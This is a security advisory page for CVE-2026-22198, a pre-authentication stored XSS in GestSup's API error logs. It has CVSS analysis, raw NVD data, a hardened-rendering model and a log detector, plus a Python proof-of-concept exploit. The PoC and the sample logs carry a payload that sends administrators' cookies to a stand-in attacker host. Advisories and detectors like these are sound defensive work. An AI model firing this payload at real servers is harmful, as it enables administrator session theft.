Security Vulnerability Report
CVE-2026-22198 CVSS 6.1 MEDIUM


Published: 2026-01-09 17:15:55
Last Modified: 2026-01-14 19:43:13

Description

GestSup versions prior to 3.2.60 contain a pre-authentication stored cross-site scripting (XSS) vulnerability in the API error logging functionality. By sending an API request with a crafted X-API-KEY header value (for example, to /api/v1/ticket.php), an unauthenticated attacker can cause attacker-controlled HTML/JavaScript to be written to log entries. When an administrator later views the affected logs in the web interface, the injected content is rendered without proper output encoding, resulting in arbitrary script execution in the administrator’s browser session.
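The following is an added example, not GestSup's code and not part of the advisory: a minimal Python model of the logging-then-rendering pattern described above, with the vulnerable renderer beside a hardened one. A failed API call's X-API-KEY header is stored in an error log entry, and the admin log viewer later turns that entry into HTML. The field names, the table layout, the attacker host and the payload are all constructed here; the point is that the fix belongs at the output boundary (HTML-encode every stored field when rendering), not in the logger.

```python
import html
from html.parser import HTMLParser

# Added example, not GestSup's code: a minimal model of the pattern the
# advisory describes. render_log_vulnerable() concatenates the stored
# X-API-KEY value raw (the CVE pattern); render_log_hardened() HTML-encodes
# every stored field at output time. Field names, layout and the payload
# are constructed; attacker.example is an assumed host.
CRAFTED_API_KEY = (
    '<img src=x onerror="fetch(`https://attacker.example/?c=`+document.cookie)">'
)

# Tags the log page legitimately emits; anything else came from stored data.
ALLOWED_TAGS = {"table", "tr", "td"}


def log_api_error(store, endpoint, api_key, message):
    """Store the entry as received. Writing the raw header is not itself the
    bug; the bug is rendering it later without encoding."""
    store.append({"endpoint": endpoint, "api_key": api_key, "message": message})
    return len(store)


def render_log_vulnerable(entries):
    """Admin log table built by string concatenation with no output encoding."""
    rows = "".join(
        f"<tr><td>{e['endpoint']}</td><td>{e['api_key']}</td><td>{e['message']}</td></tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


def render_log_hardened(entries):
    """Same table; each stored value is HTML-encoded (quotes included) on output."""
    def esc(value):
        return html.escape(str(value), quote=True)

    rows = "".join(
        f"<tr><td>{esc(e['endpoint'])}</td><td>{esc(e['api_key'])}</td>"
        f"<td>{esc(e['message'])}</td></tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


class _TagAudit(HTMLParser):
    """Parse rendered HTML the way a browser would and record any tag that is
    not part of the page template or that carries an on* event handler."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS or any(name.startswith("on") for name, _ in attrs):
            self.findings.append(tag)


def injected_tags(rendered_html):
    """Return the attacker-originated tags a browser would actually execute."""
    audit = _TagAudit()
    audit.feed(rendered_html)
    return audit.findings


def demo():
    """Log one crafted request and render it both ways."""
    store = []
    log_api_error(store, "/api/v1/ticket.php", CRAFTED_API_KEY, "invalid API key")
    vulnerable_html = render_log_vulnerable(store)
    hardened_html = render_log_hardened(store)
    return {
        "vulnerable_findings": injected_tags(vulnerable_html),  # ['img']
        "hardened_findings": injected_tags(hardened_html),      # []
        "hardened_html": hardened_html,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The audit uses a real HTML parser rather than a substring check because the escaped output still contains the literal text `onerror=` inside the cell; what matters is whether a browser would see it as a tag attribute, and after `html.escape` it does not.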

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

The NVD primary v3.1 vector matches the description: no privileges required (PR:N), user interaction required (UI:R, an administrator opening the log view), and a scope change (S:C) because the script runs in the administrator's browser rather than in the API component. The vendor-supplied secondary CVSS 4.0 metric in the raw data below (5.1 MEDIUM, AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N) instead assumes low privileges (PR:L), which disagrees with the pre-authentication claim in the description; for triage, the v3.1 assessment is the one consistent with the described attack.

Configurations (Affected Products)

cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* - VULNERABLE
GestSup < 3.2.60 (per the description; upgrade to 3.2.60 or later)
Note: the NVD CPE match in the raw data below lists versionEndIncluding 3.2.56, which is narrower than the description's "prior to 3.2.60". Scanners that key on the CPE range may not flag builds between those two values, so match on the description's range and confirm the installed version against the vendor changelog.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-22198 PoC - GestSup Stored XSS in API Error Logs
# Target: GestSup < 3.2.60
# Attack Vector: Malicious X-API-KEY header in API request

TARGET_URL = "http://target-server/api/v1/ticket.php"

# XSS payload - steals admin session cookies
xss_payload = '<img src=x onerror="fetch(`https://attacker.com/log?c=`+document.cookie)">'


def exploit_stored_xss():
    """Send malicious X-API-KEY header to inject XSS into logs"""
    headers = {
        'X-API-KEY': xss_payload,
        'Content-Type': 'application/json'
    }

    # Trigger error log by sending invalid request
    data = {
        'action': 'create',
        'invalid_param': 'test'
    }

    try:
        response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10)
        print(f"[*] Request sent to {TARGET_URL}")
        print(f"[*] Payload: {xss_payload}")
        print(f"[*] Status: {response.status_code}")

        # An error status is the only signal this PoC has that the request
        # reached the error-logging path; it cannot confirm the log write.
        if response.status_code in [400, 401, 500]:
            print("[+] XSS payload likely logged - requires admin to view logs")
            # Log-view path as given in the original PoC; the advisory itself
            # only says the logs are viewed "in the web interface".
            print("[+] When admin views logs at /index.php?page=logs, XSS will execute")
            return True
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-22198 GestSup Stored XSS PoC")
    print("=" * 60)
    exploit_stored_xss()
```
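On the defensive side, the same header is easy to watch for and easy to neutralise before it ever reaches a log. The block below is an added example, not GestSup's code and not part of the PoC above: detection logic run over constructed request-log records, plus an input-side mitigation that logs a fingerprint of the key instead of the raw header. The JSON-lines layout with an `x_api_key` field assumes a reverse proxy configured to log that header (GestSup's own log format is not documented on this page), and the legitimate-key alphabet in `VALID_KEY` is an assumption; adjust it to the real key format.

```python
import hashlib
import json
import re

# Added example, not GestSup's code. Constructed request-log records in the
# style of a reverse proxy that logs the X-API-KEY header as JSON lines;
# 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_LOG = r'''
{"ts":"2026-01-10T08:00:01Z","src":"203.0.113.7","path":"/api/v1/ticket.php","x_api_key":"b7e2c4f1a9d34e5f8a6b1c2d3e4f5a6b","status":401}
{"ts":"2026-01-10T08:00:02Z","src":"198.51.100.23","path":"/api/v1/ticket.php","x_api_key":"<img src=x onerror=\"fetch(`https://attacker.example/?c=`+document.cookie)\">","status":401}
{"ts":"2026-01-10T08:00:03Z","src":"198.51.100.23","path":"/api/v1/ticket.php","x_api_key":"<svg/onload=alert(1)>","status":400}
{"ts":"2026-01-10T08:00:04Z","src":"198.51.100.23","path":"/api/v1/ticket.php","x_api_key":"\" onmouseover=\"alert(document.domain)","status":401}
{"ts":"2026-01-10T08:00:05Z","src":"192.0.2.9","path":"/api/v1/ticket.php","x_api_key":"0123456789abcdef0123456789abcdef","status":200}
'''

# Assumed shape of a legitimate API key: a bounded token over a safe alphabet.
# Anything outside it never needs to be stored or displayed verbatim.
VALID_KEY = re.compile(r"^[A-Za-z0-9._-]{16,128}$")

# Ordered so that the most specific indicators are reported first.
MARKUP_PATTERNS = [
    (re.compile(r"<\s*[a-zA-Z!/]"), "html_tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "event_handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript_uri"),
    (re.compile(r"[\"'`]"), "quote_breakout"),
]


def classify_api_key(value):
    """Return the detection labels that fire for one X-API-KEY value
    (empty list for a well-formed key)."""
    if VALID_KEY.match(value):
        return []
    labels = [label for pattern, label in MARKUP_PATTERNS if pattern.search(value)]
    return labels or ["invalid_charset"]


def scan_log(text):
    """Walk JSON-lines request records and report sources sending markup
    in X-API-KEY, the precondition for exploiting this CVE."""
    findings = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        labels = classify_api_key(rec.get("x_api_key", ""))
        if labels:
            findings.append({"ts": rec["ts"], "src": rec["src"],
                             "path": rec["path"], "labels": labels})
    return findings


def safe_log_value(value):
    """Input-side mitigation for the logger: record a short fingerprint of
    the presented key rather than the raw header, so attacker-controlled
    bytes never enter the log at all. Output encoding in the viewer is
    still required; this only removes one source."""
    digest = hashlib.sha256(value.encode("utf-8")).hexdigest()[:12]
    prefix = "key" if VALID_KEY.match(value) else "rejected"
    return f"{prefix}:{digest}"


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(safe_log_value("<svg/onload=alert(1)>"))
```

Because the detector whitelists the expected key format first, it does not need an exhaustive XSS signature list: any value that is not a plausible key is already worth an alert, and the labels only explain why.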

References

https://gestsup.fr/index.php?page=changelog (Release Notes, vendor changelog)
https://www.vulncheck.com/advisories/gestsup-stored-xss-in-api-error-logs (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22198",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T17:15:55.310",
    "lastModified": "2026-01-14T19:43:12.993",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GestSup versions prior to 3.2.60 contain a pre-authentication stored cross-site scripting (XSS) vulnerability in the API error logging functionality. By sending an API request with a crafted X-API-KEY header value (for example, to /api/v1/ticket.php), an unauthenticated attacker can cause attacker-controlled HTML/JavaScript to be written to log entries. When an administrator later views the affected logs in the web interface, the injected content is rendered without proper output encoding, resulting in arbitrary script execution in the administrator’s browser session."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "3.2.56",
                "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gestsup.fr/index.php?page=changelog",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/gestsup-stored-xss-in-api-error-logs",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```